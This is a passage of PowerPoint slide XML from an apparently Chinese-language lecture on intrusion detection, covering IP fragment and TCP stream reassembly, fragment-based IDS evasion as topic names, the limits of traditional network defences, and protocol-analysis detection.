        <p:nvPicPr>
          <p:cNvPr id="89" name="图片 88" descr="NetworkVulnerability.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8120698" y="2801938"/>
            <a:ext cx="3500437" cy="3652837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C2B6A3E-31B6-4856-94EE-ACB69F54362F}"/>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30161" y="2820493"/>
            <a:ext cx="7275830" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="11458" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="1022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模拟目标主机对缓存的</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>碎片进行重组</a:t>
              </a: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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="3438974"/>
            <a:ext cx="7275830" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="11458" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="1022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然后进行入侵检测分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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9"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10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="2781935"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IP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>碎片重组技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2191208"/>
            <a:ext cx="3841115" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="6049" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>
              <a:ext cx="481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针对</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>IP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>碎片攻击</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pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="图片 50"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110990" y="4723765"/>
            <a:ext cx="3378835" cy="1405890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="010E84"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="25400" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7028180" y="4203065"/>
            <a:ext cx="3789045" cy="1614170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="010E84"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="88900" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104451" name="AutoShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6352540" y="1549400"/>
            <a:ext cx="3100705" cy="1355725"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11505"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F3DA47"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="6350">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片覆盖</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片重写</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片超时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>针对网络拓扑的碎片技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="右箭头 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200015" y="2551430"/>
            <a:ext cx="973455" cy="186055"/>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 name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B502815-F08B-4AA3-9681-D81EA3B51869}"/>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630161" y="3437078"/>
            <a:ext cx="9426575" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14845" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1947"/>
              <a:ext cx="136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报文丢失或者失序，还将导致</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>无法进行序列号追踪</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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9"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10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="2781935"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TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>流重组技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2191208"/>
            <a:ext cx="8839200" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13920" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="126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en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>无法使用</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>重传机制</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9" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2798903"/>
            <a:ext cx="8467725" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13335" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>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传输中出现报文丢失或者失序，将增加检测难度</a:t>
              </a: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52" name="图片 51"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9095105" y="4507230"/>
            <a:ext cx="2246630" cy="1631315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FABA49D9-9BA0-40B4-B1CD-6BB1594C0DDA}"/>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868170" y="1421130"/>
            <a:ext cx="2035810" cy="2482215"/>
            <a:chOff x="2942" y="2238"/>
            <a:chExt cx="3206" cy="3909"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2942" y="5373"/>
              <a:ext cx="320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网络访问控制</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3351" y="2238"/>
              <a:ext cx="2324" cy="3135"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1696720" y="4177030"/>
            <a:ext cx="2338705" cy="1910715"/>
            <a:chOff x="2672" y="6578"/>
            <a:chExt cx="3683" cy="3009"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="图片 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2672" y="6578"/>
              <a:ext cx="3683" cy="2235"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2972" y="8813"/>
              <a:ext cx="3184"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数据加密传输</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5116195" y="1722755"/>
            <a:ext cx="4664075" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="7345" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="5963"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无法防御来自内部的攻击</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633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5127625" y="2364105"/>
            <a:ext cx="5666105" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8923" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="7540"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无法防范数据驱动型的攻击</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35" name="组合 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="组合 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5151755" y="3005455"/>
            <a:ext cx="5666105" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8923" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="7540"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自身存在弱点，可能成为攻击对象</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40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718175" y="4744085"/>
            <a:ext cx="469900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被动防御</a:t>
            </a:r>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的网络安全技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="组合 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E972B02-BE7C-B7D2-ADCA-A8E021DB297A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5161438" y="3596160"/>
            <a:ext cx="5666105" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8923" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FCA432-827A-B2E5-25ED-AC649BC9AFFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="7540"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安全策略不能充分保证系统安全</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3B888531-B82B-0DA6-6203-817C8C884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3" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7285D7-EE34-285D-8D89-56FCFFF9A1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5489868" y="3800656"/>
            <a:ext cx="271145" cy="4914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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{898C2AA3-EAB5-4EC9-9A71-A3E4816A4582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传统的网络安全防护技术存在局限</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a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9095105" y="4507230"/>
            <a:ext cx="2246630" cy="1631315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1649211" y="4071443"/>
            <a:ext cx="9426575" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14845" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1947"/>
              <a:ext cx="136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将会话流量作为整体考虑，加入状态特性分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>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3"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45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="3437078"/>
            <a:ext cx="9426575" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14845" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1947"/>
              <a:ext cx="136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大大减少计算量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="150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9"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10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="3168000"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48893" y="3293024"/>
              <a:ext cx="1127125" cy="46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sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>协议分析检测</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
